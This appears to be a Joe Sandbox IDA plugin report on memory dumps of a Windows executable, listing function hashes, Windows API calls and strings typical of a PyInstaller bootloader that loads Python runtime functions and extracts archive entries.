Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbef8b130d79a7ad9bd62ede7a83548c92a3f011a0e32d449ba268992e3839f7
Instruction ID: f64ee5d0f2d14c4412f3ebd9eeef38d4bbde1ecad13d103863ff3a1018d37ef7
Opcode Fuzzy Hash: cbef8b130d79a7ad9bd62ede7a83548c92a3f011a0e32d449ba268992e3839f7
Instruction Fuzzy Hash: 49517F37A286A186E7248B29C14833837A1EB49F58F248171CE4D977ACCF3BE953C745

Function 00007FF6E60B20A0 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8494ecf62f03c1d3943c1d589e4c29644468de266d09ee5189585ab02985f6c2
Instruction ID: d748cbdd054b108fe521dcec21b3516493f2917c30a32ab714d284d5ade30fab
Opcode Fuzzy Hash: 8494ecf62f03c1d3943c1d589e4c29644468de266d09ee5189585ab02985f6c2
Instruction Fuzzy Hash: 01514E37A3866186E7258B29C24033927A1EB59B58F288531CB4DA7798CF3BEC53C745

Function 00007FF6E60B1C90 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4595b9fb9fef9db7488d00d8b5cf28c2737f3b7c2e6c847ec82cdef55389f28
Instruction ID: 022a65c4f2b1f40e0defa59ee6acf4e6fa11d91c538d02667948e7d34116820c
Opcode Fuzzy Hash: d4595b9fb9fef9db7488d00d8b5cf28c2737f3b7c2e6c847ec82cdef55389f28
Instruction Fuzzy Hash: 72519037A2866186E7248B29D15833C37A1EB49B58F248171CE4D9779CDF3BE843C785

Function 00007FF6E60B5F30 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
Instruction ID: fbeba23d3db295622b5bd2f298dda6011dcca268fe8944b3d9251f097886a003
Opcode Fuzzy Hash: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
Instruction Fuzzy Hash: 1641CE53879BAF44E9A28D1907007B56A80EF22BA0D58D3F4DD99973DFCC0F2587820B

Function 00007FF6E60BA430 Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: ebc62af25f4a924abe1fa2d5abdeed76b263ad9941eeccbef4e1511c1356119b
Instruction ID: f51cf89ddba5a82f3549a2e5956e86c27a7e015e6222166243e091a619b6bc8c
Opcode Fuzzy Hash: ebc62af25f4a924abe1fa2d5abdeed76b263ad9941eeccbef4e1511c1356119b
Instruction Fuzzy Hash: 8041E573724A6582EF14CF2ADA1826963A1E748FD0B099036DE0DC7B58DE3ED5868304

Function 00007FF6E60B7C98 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97dbf60876fcd0633a649bc779bfe1af7a9be6d7cd19397e9a759bc507e901db
Instruction ID: 7a0b0bc3934776725a9ac2b0b1e68f924d551062baa37db2d8d8966cd43ef9db
Opcode Fuzzy Hash: 97dbf60876fcd0633a649bc779bfe1af7a9be6d7cd19397e9a759bc507e901db
Instruction Fuzzy Hash: 1C31EB33719B5241E765DF25B54037D6AD5AB84BD0F048238EA4E977DADF3ED0018309

Function 00007FF6E60C9E40 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dada551c461b21fdad657b6bac4cbdfad31b05eb9b59333086b2e0a15b162055
Instruction ID: 8634869f8cad379936c93f6716d95d2e662f3dc690bd477bf67c0d4331b3198b
Opcode Fuzzy Hash: dada551c461b21fdad657b6bac4cbdfad31b05eb9b59333086b2e0a15b162055
Instruction Fuzzy Hash: 98F068727282758ADB948F29A50272977D0F7483C0F80C079D58DC3F14DA3E90508F09

Function 00007FF6E60AC760 Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5749315d7b24dceccc8714b5042f108a7de79c1631c17c6a95dc8ed6b888950b
Instruction ID: 40c65f10c780ad11871ad7ec2c52e03b0c90472192a6b3e97f7b00b3e74adfb5
Opcode Fuzzy Hash: 5749315d7b24dceccc8714b5042f108a7de79c1631c17c6a95dc8ed6b888950b
Instruction Fuzzy Hash: 50A0023392CC66D0E6848B14EA542742330FB51341BA10031D80EC50A0DF3FE541C31A

Function 00007FF6E60A51E0 Relevance: 233.1, APIs: 44, Strings: 89, Instructions: 363libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,?,00000000,00007FF6E60A346E), ref: 00007FF6E60A51F0
GetProcAddress.KERNEL32(?,?,00000000,00007FF6E60A346E), ref: 00007FF6E60A522A
GetProcAddress.KERNEL32(?,?,00000000,00007FF6E60A346E), ref: 00007FF6E60A524F
GetProcAddress.KERNEL32(?,?,00000000,00007FF6E60A346E), ref: 00007FF6E60A5274
GetProcAddress.KERNEL32(?,?,00000000,00007FF6E60A346E), ref: 00007FF6E60A529C
GetProcAddress.KERNEL32(?,?,00000000,00007FF6E60A346E), ref: 00007FF6E60A52C4
GetProcAddress.KERNEL32(?,?,00000000,00007FF6E60A346E), ref: 00007FF6E60A52EC
GetProcAddress.KERNEL32(?,?,00000000,00007FF6E60A346E), ref: 00007FF6E60A5314
GetProcAddress.KERNEL32(?,?,00000000,00007FF6E60A346E), ref: 00007FF6E60A533C
GetProcAddress.KERNEL32(?,?,00000000,00007FF6E60A346E), ref: 00007FF6E60A5364

Strings

PyUnicode_FromFormat, xrefs: 00007FF6E60A5832
PySys_GetObject, xrefs: 00007FF6E60A576A
Failed to get address for PyErr_Clear, xrefs: 00007FF6E60A5416
PyErr_NormalizeException, xrefs: 00007FF6E60A544A
PyConfig_Clear, xrefs: 00007FF6E60A530A
Py_IsInitialized, xrefs: 00007FF6E60A52BA
Failed to get address for Py_ExitStatusException, xrefs: 00007FF6E60A5261
Failed to get address for PyRun_SimpleStringFlags, xrefs: 00007FF6E60A5736
PyErr_Restore, xrefs: 00007FF6E60A54C2
Failed to get address for PyUnicode_FromFormat, xrefs: 00007FF6E60A584E
Failed to get address for PyObject_CallFunction, xrefs: 00007FF6E60A5646
Py_DecodeLocale, xrefs: 00007FF6E60A5220
PyErr_Print, xrefs: 00007FF6E60A549A
PyConfig_InitIsolatedConfig, xrefs: 00007FF6E60A5332
Failed to get address for Py_InitializeFromConfig, xrefs: 00007FF6E60A52AE
PyRun_SimpleStringFlags, xrefs: 00007FF6E60A571A
PyObject_GetAttrString, xrefs: 00007FF6E60A567A
PyObject_SetAttrString, xrefs: 00007FF6E60A56A2
PyMem_RawFree, xrefs: 00007FF6E60A55DA
PyObject_CallFunction, xrefs: 00007FF6E60A562A
PyModule_GetDict, xrefs: 00007FF6E60A5602
PyUnicode_Join, xrefs: 00007FF6E60A5882
Failed to get address for PySys_GetObject, xrefs: 00007FF6E60A5786
PyUnicode_Replace, xrefs: 00007FF6E60A58AA
PyImport_AddModule, xrefs: 00007FF6E60A5512
PyStatus_Exception, xrefs: 00007FF6E60A5742
PyConfig_SetBytesString, xrefs: 00007FF6E60A5382
GetProcAddress, xrefs: 00007FF6E60A5209
Failed to get address for PyObject_Str, xrefs: 00007FF6E60A56E6
Failed to get address for PyConfig_SetWideStringList, xrefs: 00007FF6E60A53EE
PyEval_EvalCode, xrefs: 00007FF6E60A54EA
Failed to get address for PyConfig_SetBytesString, xrefs: 00007FF6E60A539E
PyMarshal_ReadObjectFromString, xrefs: 00007FF6E60A55B2
Failed to get address for PyConfig_Clear, xrefs: 00007FF6E60A5326
PyObject_CallFunctionObjArgs, xrefs: 00007FF6E60A5652
PyConfig_SetString, xrefs: 00007FF6E60A53AA
PySys_SetObject, xrefs: 00007FF6E60A5792
Py_ExitStatusException, xrefs: 00007FF6E60A5245
PyUnicode_Decode, xrefs: 00007FF6E60A57E2
Py_DecRef, xrefs: 00007FF6E60A51E6
Failed to get address for PyImport_ImportModule, xrefs: 00007FF6E60A557E
Failed to get address for PyConfig_InitIsolatedConfig, xrefs: 00007FF6E60A534E
Failed to get address for PyErr_Fetch, xrefs: 00007FF6E60A543E
PyUnicode_AsUTF8, xrefs: 00007FF6E60A57BA
Failed to get address for PyPreConfig_InitIsolatedConfig, xrefs: 00007FF6E60A570E
Failed to get address for Py_DecRef, xrefs: 00007FF6E60A5202
Py_InitializeFromConfig, xrefs: 00007FF6E60A5292
Failed to get address for PyErr_Print, xrefs: 00007FF6E60A54B6
Failed to get address for PyObject_SetAttrString, xrefs: 00007FF6E60A56BE
Failed to get address for PyImport_ExecCodeModule, xrefs: 00007FF6E60A5556
PyObject_Str, xrefs: 00007FF6E60A56CA
Failed to get address for PySys_SetObject, xrefs: 00007FF6E60A57AE
Failed to get address for Py_Finalize, xrefs: 00007FF6E60A5286
Failed to get address for PyMem_RawFree, xrefs: 00007FF6E60A55F6
Py_Finalize, xrefs: 00007FF6E60A526A
Failed to get address for PyErr_Occurred, xrefs: 00007FF6E60A548E
Failed to get address for PyStatus_Exception, xrefs: 00007FF6E60A575E
Failed to get address for PyImport_AddModule, xrefs: 00007FF6E60A552E
PyConfig_SetWideStringList, xrefs: 00007FF6E60A53D2
Failed to get address for PyConfig_Read, xrefs: 00007FF6E60A5376
Failed to get address for PyUnicode_Join, xrefs: 00007FF6E60A589E
Failed to get address for PyList_Append, xrefs: 00007FF6E60A55A6
PyErr_Clear, xrefs: 00007FF6E60A53FA
PyConfig_Read, xrefs: 00007FF6E60A535A
Failed to get address for PyErr_Restore, xrefs: 00007FF6E60A54DE
Failed to get address for Py_IsInitialized, xrefs: 00007FF6E60A52D6
Failed to get address for Py_PreInitialize, xrefs: 00007FF6E60A52FE
Failed to get address for PyUnicode_DecodeFSDefault, xrefs: 00007FF6E60A5826
Failed to get address for PyUnicode_Decode, xrefs: 00007FF6E60A57FE
Failed to get address for PyObject_CallFunctionObjArgs, xrefs: 00007FF6E60A566E
PyErr_Fetch, xrefs: 00007FF6E60A5422
Failed to get address for PyUnicode_AsUTF8, xrefs: 00007FF6E60A57D6
PyUnicode_DecodeFSDefault, xrefs: 00007FF6E60A580A
Failed to get address for PyErr_NormalizeException, xrefs: 00007FF6E60A5466
Failed to get address for Py_DecodeLocale, xrefs: 00007FF6E60A523C
Failed to get address for PyObject_GetAttrString, xrefs: 00007FF6E60A5696
PyPreConfig_InitIsolatedConfig, xrefs: 00007FF6E60A56F2
Failed to get address for PyEval_EvalCode, xrefs: 00007FF6E60A5506
Failed to get address for PyMarshal_ReadObjectFromString, xrefs: 00007FF6E60A55CE
PyUnicode_FromString, xrefs: 00007FF6E60A585A
PyErr_Occurred, xrefs: 00007FF6E60A5472
PyImport_ExecCodeModule, xrefs: 00007FF6E60A553A
PyList_Append, xrefs: 00007FF6E60A558A
PyImport_ImportModule, xrefs: 00007FF6E60A5562
Failed to get address for PyUnicode_FromString, xrefs: 00007FF6E60A5876
Failed to get address for PyModule_GetDict, xrefs: 00007FF6E60A561E
Py_PreInitialize, xrefs: 00007FF6E60A52E2
Failed to get address for PyConfig_SetString, xrefs: 00007FF6E60A53C6
Failed to get address for PyUnicode_Replace, xrefs: 00007FF6E60A58C6

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID: AddressProc
String ID: Failed to get address for PyConfig_Clear$Failed to get address for PyConfig_InitIsolatedConfig$Failed to get address for PyConfig_Read$Failed to get address for PyConfig_SetBytesString$Failed to get address for PyConfig_SetString$Failed to get address for PyConfig_SetWideStringList$Failed to get address for PyErr_Clear$Failed to get address for PyErr_Fetch$Failed to get address for PyErr_NormalizeException$Failed to get address for PyErr_Occurred$Failed to get address for PyErr_Print$Failed to get address for PyErr_Restore$Failed to get address for PyEval_EvalCode$Failed to get address for PyImport_AddModule$Failed to get address for PyImport_ExecCodeModule$Failed to get address for PyImport_ImportModule$Failed to get address for PyList_Append$Failed to get address for PyMarshal_ReadObjectFromString$Failed to get address for PyMem_RawFree$Failed to get address for PyModule_GetDict$Failed to get address for PyObject_CallFunction$Failed to get address for PyObject_CallFunctionObjArgs$Failed to get address for PyObject_GetAttrString$Failed to get address for PyObject_SetAttrString$Failed to get address for PyObject_Str$Failed to get address for PyPreConfig_InitIsolatedConfig$Failed to get address for PyRun_SimpleStringFlags$Failed to get address for PyStatus_Exception$Failed to get address for PySys_GetObject$Failed to get address for PySys_SetObject$Failed to get address for PyUnicode_AsUTF8$Failed to get address for PyUnicode_Decode$Failed to get address for PyUnicode_DecodeFSDefault$Failed to get address for PyUnicode_FromFormat$Failed to get address for PyUnicode_FromString$Failed to get address for PyUnicode_Join$Failed to get address for PyUnicode_Replace$Failed to get address for Py_DecRef$Failed to get address for Py_DecodeLocale$Failed to get address for Py_ExitStatusException$Failed to get address for Py_Finalize$Failed to get address for Py_InitializeFromConfig$Failed to get address for Py_IsInitialized$Failed to get address for Py_PreInitialize$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
API String ID: 190572456-4266016200
Opcode ID: cf77275b4bf0387ff900e5ea28e17749df250fc4abdfb995cff073003fe970f9
Instruction ID: 27979b58e5879f0ec2b050aacbbc91206dd77aa6812eb625a56ddf0ca1169d27
Opcode Fuzzy Hash: cf77275b4bf0387ff900e5ea28e17749df250fc4abdfb995cff073003fe970f9
Instruction Fuzzy Hash: 4D12E97696AB2381FA55CB04EA5037423A1BF45781B985535C81FCA3A0FF7FA849C31E

Function 00007FF6E60A12B0 Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 136COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6E60A2B30: MessageBoxW.USER32 ref: 00007FF6E60A2C05

_fread_nolock.LIBCMT ref: 00007FF6E60A1499

Strings

\, xrefs: 00007FF6E60A13F5
Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF6E60A1370
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF6E60A132B
%s%c%s, xrefs: 00007FF6E60A13EE
fread, xrefs: 00007FF6E60A14C6
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF6E60A14BF
Failed to extract %s: failed to open archive file!, xrefs: 00007FF6E60A12FE
fseek, xrefs: 00007FF6E60A1332
malloc, xrefs: 00007FF6E60A1377

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID: Message_fread_nolock
String ID: %s%c%s$Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$\$fread$fseek$malloc
API String ID: 3065259568-2316137593
Opcode ID: 80c1ceb522335a453d73f94936c28ade423db0aeb6dc10fc023faf92f2617520
Instruction ID: 8723710f76a60efb8bf95f34bbddd8607814bffbde3bfbecedb58375ae7b9448
Opcode Fuzzy Hash: 80c1ceb522335a453d73f94936c28ade423db0aeb6dc10fc023faf92f2617520
Instruction Fuzzy Hash: 0B51D433B286A345EA20A711AA547FA2394EF447C8F504431EE4EC7B89EF7FE5458309

Function 00007FF6E60A23F0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00007FF6E60A241B
SelectObject.GDI32 ref: 00007FF6E60A2462
DrawTextW.USER32 ref: 00007FF6E60A2485
SelectObject.GDI32 ref: 00007FF6E60A249B
ReleaseDC.USER32 ref: 00007FF6E60A24AB
MoveWindow.USER32 ref: 00007FF6E60A24FB
MoveWindow.USER32 ref: 00007FF6E60A253B
MoveWindow.USER32 ref: 00007FF6E60A258E
MoveWindow.USER32 ref: 00007FF6E60A25D6

Strings

P%, xrefs: 00007FF6E60A246F

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID: MoveWindow$ObjectSelect$DrawReleaseText
String ID: P%
API String ID: 2147705588-2959514604
Opcode ID: 7645c0c2d2fce03d3aab2d1fd33ee4a3925b53edade4cf92fedf68089910dc30
Instruction ID: dc478b1073bde944cea381896430ce3703c1c1c14d4dbe1aa692c5027a9002fa
Opcode Fuzzy Hash: 7645c0c2d2fce03d3aab2d1fd33ee4a3925b53edade4cf92fedf68089910dc30
Instruction Fuzzy Hash: 4851E736618BB186D6249F26B4182BAB7A1F798BA1F004131EFDF83694DF3DD085DB14

Function 00007FF6E60B67A4 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 494COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6E60B67E7
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6E60B6BD4
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6E60B6E70

Strings

p, xrefs: 00007FF6E60B6899
-, xrefs: 00007FF6E60B687D
f, xrefs: 00007FF6E60B6909
:, xrefs: 00007FF6E60B69A0
p, xrefs: 00007FF6E60B6911

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: -$:$f$p$p
API String ID: 3215553584-2013873522
Opcode ID: c6ac63e3974c66327622d921c1304357062fd3cb2bcbfe9c56688102bfb98152
Instruction ID: 7245e8c267093bb642229e8edb352aed462d1bbecb6b5e32dd62349f984bcbd6
Opcode Fuzzy Hash: c6ac63e3974c66327622d921c1304357062fd3cb2bcbfe9c56688102bfb98152
Instruction Fuzzy Hash: 7512B563E3C96386FB209B14E2547B976A1EB40754F94C535E689876CCDF3FE4808B0A

Function 00007FF6E60B1108 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6E60B1148
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6E60B1510
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6E60B17AF

Strings

f, xrefs: 00007FF6E60B1395
f, xrefs: 00007FF6E60B124A
p, xrefs: 00007FF6E60B1252
f, xrefs: 00007FF6E60B11E0
p, xrefs: 00007FF6E60B11ED

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: f$f$p$p$f
API String ID: 3215553584-1325933183
Opcode ID: 7160b50ef5c5d9843a5fd5f0d5cd643ebb1f382f7049b3f2f81a6a7c29ab944c
Instruction ID: c4be31f58000290f9548a758f78d5f0fa31b45fc6f4755d3ba080e177eae1680
Opcode Fuzzy Hash: 7160b50ef5c5d9843a5fd5f0d5cd643ebb1f382f7049b3f2f81a6a7c29ab944c
Instruction Fuzzy Hash: 0E128173E2C16385FB209A14E25C77A7261FB40754F848175D69A876CCDF7FE9808B0A

